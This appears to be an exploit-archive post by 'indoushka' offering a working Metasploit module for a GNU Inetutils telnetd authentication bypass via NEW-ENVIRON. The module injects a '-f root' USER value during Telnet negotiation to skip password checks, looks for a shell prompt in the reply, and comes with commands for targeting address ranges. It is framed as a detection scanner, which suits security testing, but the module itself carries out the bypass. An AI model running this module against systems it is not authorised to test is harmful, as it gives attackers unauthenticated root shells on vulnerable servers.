GNU Inetutils 2.7 Telnet Authentication Bypass Scanner
=============================================================================================================================================
| # Title GNU Inetutils 2.7 Telnet Authentication Bypass Scanner
=============================================================================================================================================
| # Title : GNU Inetutils 2.7 Telnet NEW-ENVIRON Authentication Bypass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : System built-in component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214219/ & CVE-2026-24061
[+] Summary : This Metasploit auxiliary scanner detects a Telnet authentication bypass vulnerability related to improper handling of the NEW-ENVIRON option during Telnet negotiation.
The issue allows an attacker to inject a malformed USER environment variable (for example, using flags such as -f root) when the server requests environment variables.
Affected Telnet daemons may incorrectly trust this input, potentially bypassing password authentication and granting immediate shell access.
The module passively listens for the IAC SB NEW-ENVIRON SEND request, then responds with a crafted subnegotiation payload to test whether the target accepts the malicious USER value.
It verifies success by analyzing server responses for common indicators of a successful login or shell prompt. When exploitation indicators are detected,
the module reports the vulnerability in the Metasploit database.
This scanner is intended for security assessment and detection purposes against vulnerable Telnet servers, including implementations such as GNU Inetutils telnetd up to affected versions,
and aligns conceptually with historical NEW-ENVIRON authentication bypass issues (e.g., CVE-1999-0192 and related Telnet environment variable flaws).
[+] Usage :
# View available options
show options
# Set target(s)
set RHOSTS <target_IP_or_range>
# Example: set RHOSTS 192.168.1.1
# Or for a range: set RHOSTS 192.168.1.1-254
# Optional: Change port if Telnet is on non-standard port
set RPORT 2323
# Optional: Adjust timeout (default: 5 seconds)
set TIMEOUT 10
# Optional: Change payload (default: "-f root")
set USER_PAYLOAD "-f admin"
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary scanner that probes a Telnet service for the NEW-ENVIRON USER
# handling weakness described in the module metadata. It only takes part in
# option negotiation and inspects what the server sends back; it never runs
# commands on the target and never opens a session.
class MetasploitModule < Msf::Auxiliary
  Rank = NormalRanking

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::Telnet

  # Registers the module metadata and the user-tunable options
  # (RPORT, USER_PAYLOAD, TIMEOUT).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Telnet NEW-ENVIRON Authentication Bypass Scanner',
      'Description' => %q{
This module scans Telnet servers for the historical NEW-ENVIRON
authentication bypass vulnerability (CVE-1999-0192).
Vulnerable Telnet daemons may incorrectly process environment
variables supplied during NEW-ENVIRON negotiation. By injecting
a malformed USER value (e.g., "-f root"), authentication checks
may be bypassed.
This module detects and confirms the bypass condition only.
It does NOT execute commands or create a session.
},
      'Author' =>
        [
          'indoushka'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '1999-0192'],
          ['RFC', '1572']
        ],
      'DisclosureDate' => '1994-12-12'
    ))

    register_options(
      [
        Opt::RPORT(23),
        # Value placed in the USER variable of the NEW-ENVIRON reply.
        OptString.new(
          'USER_PAYLOAD',
          [
            true,
            'Malformed USER environment value',
            '-f root'
          ]
        ),
        # Upper bound (seconds) for the whole negotiation and for the
        # final response read.
        OptInt.new(
          'TIMEOUT',
          [
            true,
            'Timeout for Telnet negotiation (seconds)',
            5
          ]
        )
      ]
    )
  end

  # Scanner callback invoked once per target host.
  #
  # Connects, turns off the mixin's automatic option negotiation so the raw
  # IAC stream is visible, then reads until either a NEW-ENVIRON SEND
  # subnegotiation arrives or a read returns nil. Success is judged solely by
  # a regex over the next chunk the server sends, so a greeting banner that
  # happens to contain "welcome" satisfies it; treat a "confirmed" result as a
  # heuristic to be verified, not as proof of a bypass.
  #
  # @param ip [String] target address supplied by the scanner mixin
  # @return [void]
  def run_host(ip)
    begin
      connect
      print_status("#{ip}:#{rport} - Connected to Telnet service")
      # presumably disables the Telnet mixin's own IAC option handling so the
      # server's requests reach this loop untouched — confirm against the mixin
      self.sock.telnet_options[:negotiation] = false
      new_environ_requested = false
      # Outer bound on the whole exchange; the inner get_once calls carry
      # their own, shorter read timeouts.
      ::Timeout.timeout(datastore['TIMEOUT']) do
        loop do
          # 1-second read; nil means nothing more arrived and we stop looking.
          data = sock.get_once(-1, 1)
          break if data.nil?
          # IAC SB NEW-ENVIRON(0x27) SEND(0x01): the server asks the client for
          # environment variables (codes per RFC 1572).
          if data.include?("\xff\xfa\x27\x01")
            new_environ_requested = true
            print_good("#{ip}:#{rport} - NEW-ENVIRON request detected")
            # Assemble the IS subnegotiation answering the SEND:
            # IAC SB NEW-ENVIRON IS, VAR "USER", VALUE <payload>, IAC SE.
            buf = "\xff\xfa\x27\x00"
            buf += "\x00USER"
            buf += "\x01"
            buf += datastore['USER_PAYLOAD']
            buf += "\xff\xf0"
            print_status("#{ip}:#{rport} - Sending USER=#{datastore['USER_PAYLOAD']}")
            Rex.sleep(1)
            # Read whatever the server sends next, waiting up to TIMEOUT seconds.
            response = sock.get_once(-1, datastore['TIMEOUT'])
            # Heuristic success check: login- or prompt-like text in the reply.
            # NOTE(review): a banner containing "welcome" also matches, so
            # false positives are possible.
            if response && response =~ /(last login|welcome|login successful|[#\$]>)/i
              print_good("#{ip}:#{rport} - AUTHENTICATION BYPASS CONFIRMED")
              print_status("#{ip}:#{rport} - Server response: #{response.strip}")
              # Persist the finding in the framework database; the stored info
              # records which USER value was used.
              report_vuln(
                host: ip,
                port: rport,
                proto: 'tcp',
                name: self.name,
                refs: self.references,
                info: "Authentication bypass via NEW-ENVIRON (USER=#{datastore['USER_PAYLOAD']})"
              )
            else
              print_status("#{ip}:#{rport} - Payload sent, but bypass not confirmed")
            end
            # One exchange per host, confirmed or not.
            break
          end
        end
      end
      unless new_environ_requested
        print_error("#{ip}:#{rport} - NEW-ENVIRON was not requested (likely not vulnerable)")
      end
    rescue ::Timeout::Error
      print_error("#{ip}:#{rport} - Timeout during Telnet negotiation")
    # Unreachable or refusing hosts are skipped without output by design.
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::EOFError
      print_error("#{ip}:#{rport} - Server closed the connection")
    rescue ::Interrupt
      # Let Ctrl-C propagate to the framework instead of being reported below.
      raise
    # NOTE(review): rescuing ::Exception also traps SystemExit and NoMemoryError;
    # ::StandardError would be the conventional, narrower choice here.
    rescue ::Exception => e
      print_error("#{ip}:#{rport} - Unexpected error: #{e.class} - #{e.message}")
    ensure
      # Always release the socket, even after an error or timeout.
      disconnect
    end
  end
end
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================